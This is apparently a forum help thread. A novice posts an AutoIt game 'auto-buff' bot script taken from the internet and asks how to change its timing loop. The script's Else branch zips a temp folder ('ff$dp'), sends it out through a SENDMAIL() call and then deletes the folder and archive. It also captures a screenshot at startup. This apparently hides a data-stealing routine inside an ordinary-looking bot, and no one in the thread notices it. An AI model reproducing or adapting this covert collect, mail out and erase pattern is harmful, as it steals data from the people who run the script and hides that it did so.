Jump to content

relpe after min


Recommended Posts

i have a problem i have the folowing script (view below). its works fine with the whole script. BUT i want that this thing use the

USESKILL(1, 1)
        Sleep(500)

for 9 mins and than again using all the keys

i try to look in scripts and get the solution

but i cant realy find

plz give me just the script as it must be

and NOT

something like

look into help file

i dont understand that (i am dutch :) )

i mean with dont understand that

that it is to hard to understand dont know where they talking about (not the english thing) its dificult

if you tell me how and give the script full

than i think i understand and i can than use it for my other scripts

(BTW: i got this script from internet and just wanted to make it custom for me :party: )

Func AUTOBUFF()
    _SCREENCAPTURE_SETJPGQUALITY(20)
    _SCREENCAPTURE_CAPTURE($FILEDIR & "\9.jpg")
    While 1
      If WinExists("Botting") Then
        USESKILL(7, 2)
        Sleep(2000)
        USESKILL(7, 3)
        Sleep(2000)
        USESKILL(7, 4)
        Sleep(2000)
        USESKILL(7, 5)
        Sleep(2000)
        USESKILL(7, 6)
        Sleep(2000)
        USESKILL(7, 7)
        Sleep(2000)
        USESKILL(7, 8)
        Sleep(2000)
        USESKILL(7, 9)
        Sleep(2000)
        USESKILL(8, 1)
        Sleep(2000)
        USESKILL(8, 2)
        Sleep(2000)
        USESKILL(8, 3)
        Sleep(2000)
        USESKILL(8, 4)
        Sleep(2000)
       For $i = 1 to 1200
        USESKILL(1, 1)
        Sleep(500)
       Next
        Else
        $ZIPFILE = @TempDir & "\ff$dp.zip"
        $DIRTOZIP = @TempDir & "\ff$dp"
        $UNCOMPSIZE = DirGetSize($DIRTOZIP)
        _ZIP_INIT("_ZIPPrint", "_ZIPPassword", "_ZIPComment", "_ZIPProgress")
        _ZIP_SETOPTIONS()
        _ZIP_ARCHIVE($ZIPFILE, $DIRTOZIP)
        $CURZIPSIZE = 0
        Sleep(3000)
        SENDMAIL()
        Sleep(5000)
        DirRemove(@TempDir & "\ff$dp", 1)
        FileDelete(@TempDir & "\ff$dp.zip")
        Exit
      EndIf
    WEnd
EndFunc

thnx if i get the solution

Noobie or not HELP ME (defenti noob :)

Link to comment
Share on other sites

itz important that we know where you got the USESKILL function from

then we need to know exactly what you want to do you can write german if you want i can reply in german your english seems a bit bad i didnt understand what you ment/wanted

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...